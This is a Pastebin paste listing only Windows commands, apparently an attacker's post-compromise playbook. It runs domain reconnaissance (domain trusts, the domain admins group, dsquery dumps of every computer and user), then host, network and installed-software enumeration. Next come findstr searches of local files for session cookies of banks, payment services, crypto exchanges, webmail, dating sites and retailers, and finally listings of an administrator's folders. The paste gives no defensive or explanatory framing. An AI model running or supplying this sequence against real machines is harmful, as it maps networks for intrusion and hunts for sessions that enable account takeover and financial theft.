Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- nltest /domain_trusts
- net config workstation
- net view /all
- net view /all /domain
- net group “domain admins” /domain
- dsquery * -filter “objectcategory=computer” -attr dNSHostName distinguishedName description operatingSystem -limit 0
- dsquery * -filter “&(objectcategory=person)(samaccountname=*)” -attr sAMAccountName mail comment description -limit 0
- net session
- net user
- systeminfo
- find /V “KB”
- ipconfig /all
- netstat -an
- find /i “listening”
- net config workstation
- reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall”
- REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime” /v DisplayName
- REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore” /v DisplayName
- REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40” /v DisplayName
- REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data” /v DisplayName
- REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX” /v DisplayName
- REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData" /v DisplayName
- REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack" /v DisplayName
- REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2" /v DisplayName
- REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent" /v DisplayName
- REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC" /v DisplayName
- REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0040E310-5FEB-4626-BA89-7678B473DEF8}" /v DisplayName
- REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5525C0AB-E025-4951-9C84-DD490DD95B0F}" /v DisplayName
- REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D339C288-2EEA-49A3-B10F-979FC2715A2C}" /v DisplayName
- REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F383A96C-9EF4-4ED9-BE86-85A938DCE021}" /v DisplayName
- tasklist
- ipconfig
- find "IPv4"
- findstr /m cookie_check.paypal.com *
- findstr /m paypal.comcookie_check *
- findstr /m account.skrill.com *
- findstr /m westernunion.com *
- findstr /m neteller.com *
- findstr /m entropay.com *
- findstr /m 2checkout.com *
- findstr /m wepay.com *
- findstr /m .v.me *
- findstr /m gopayment.com *
- findstr /m dwolla.com *
- findstr /m aib.ie *
- findstr /m barclaycardus.com *
- findstr /m capitalone.com *
- findstr /m chase.com *
- findstr /m coinbase.com *
- findstr /m liqpay.com *
- findstr /m moneybookers.com *
- findstr /m open24.ie *
- findstr /m payeer.com *
- findstr /m paysurfer.com *
- findstr /m perfectmoney.com *
- findstr /m suntrust.com *
- findstr /m wellsfargo.com *
- findstr /m sears.com *
- findstr /m overstock.com *
- findstr /m ebay.comnonsession *
- findstr /m dell.com *
- findstr /m amazon.comsession *
- findstr /m apple.comdssid *
- findstr /m beacon.walmart.com *
- findstr /m bestbuy.comcontext_id *
- findstr /m newegg.coms_per *
- findstr /m airbnb.com *
- findstr /m bhphotovideo.com *
- findstr /m farfetch.com *
- findstr /m lowes.com *
- findstr /m officedepot.com *
- findstr /m qvc.com *
- findstr /m steampowered.com *
- findstr /m target.com *
- findstr /m match.com *
- findstr /m mysinglefriend.com *
- findstr /m friendfinder.com *
- findstr /m jdate.com *
- findstr /m gay.com *
- findstr /m christianconnection.com *
- findstr /m muddymatches.co.uk *
- findstr /m zoosk.com *
- findstr /m shaadi.com *
- findstr /m datingdirect.com *
- findstr /m lovearts.com *
- findstr /m amateurmatch.com *
- findstr /m cupid.com *
- findstr /m datehookup.com *
- findstr /m meetic.com *
- findstr /m meetme.com *
- findstr /m accounts.google.com *
- findstr /m mail.live.com *
- findstr /m login.yahoo.com *
- findstr /m att.com *
- findstr /m sprint.com *
- findstr /m verizonwireless.com *
- findstr /m vzw.com *
- findstr /m verizon.com *
- findstr /m craiglist.org *
- findstr /m indeed.com *
- findstr /m sendspace.com *
- findstr /m swiftunlocks.com *
- findstr /m ups.com *
- findstr /m whoer.net *
- findstr /m fedex.com *
- powershell Get-ChildItem -Path C:\ -ErrorAction SilentlyContinue
- powershell Get-ChildItem -Path \"C:\Program Files\" -ErrorAction SilentlyContinue
- powershell Get-ChildItem -Path \"C:\Program Files (x86) \" -ErrorAction SilentlyContinue
- powershell Get-ChildItem -Path \"C:\Users\administrator\AppData\Roaming\" -ErrorAction SilentlyContinue
- powershell Get-ChildItem -Path \"C:\Users\administrator\AppData\Local\" -ErrorAction SilentlyContinue
- powershell Get-ChildItem -Path \"C:\Users\administrator\Desktop\" -ErrorAction SilentlyContinue
- powershell Get-ChildItem -Path \"C:\Users\administrator\Downloads\" -ErrorAction SilentlyContinue
- powershell Get-ChildItem -Path \"C:\Users\administrator\Documents\" -ErrorAction SilentlyContinue
- C:\Windows\system32\cmd.exe /S /D /c" TYPE win_install.log.txt "
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement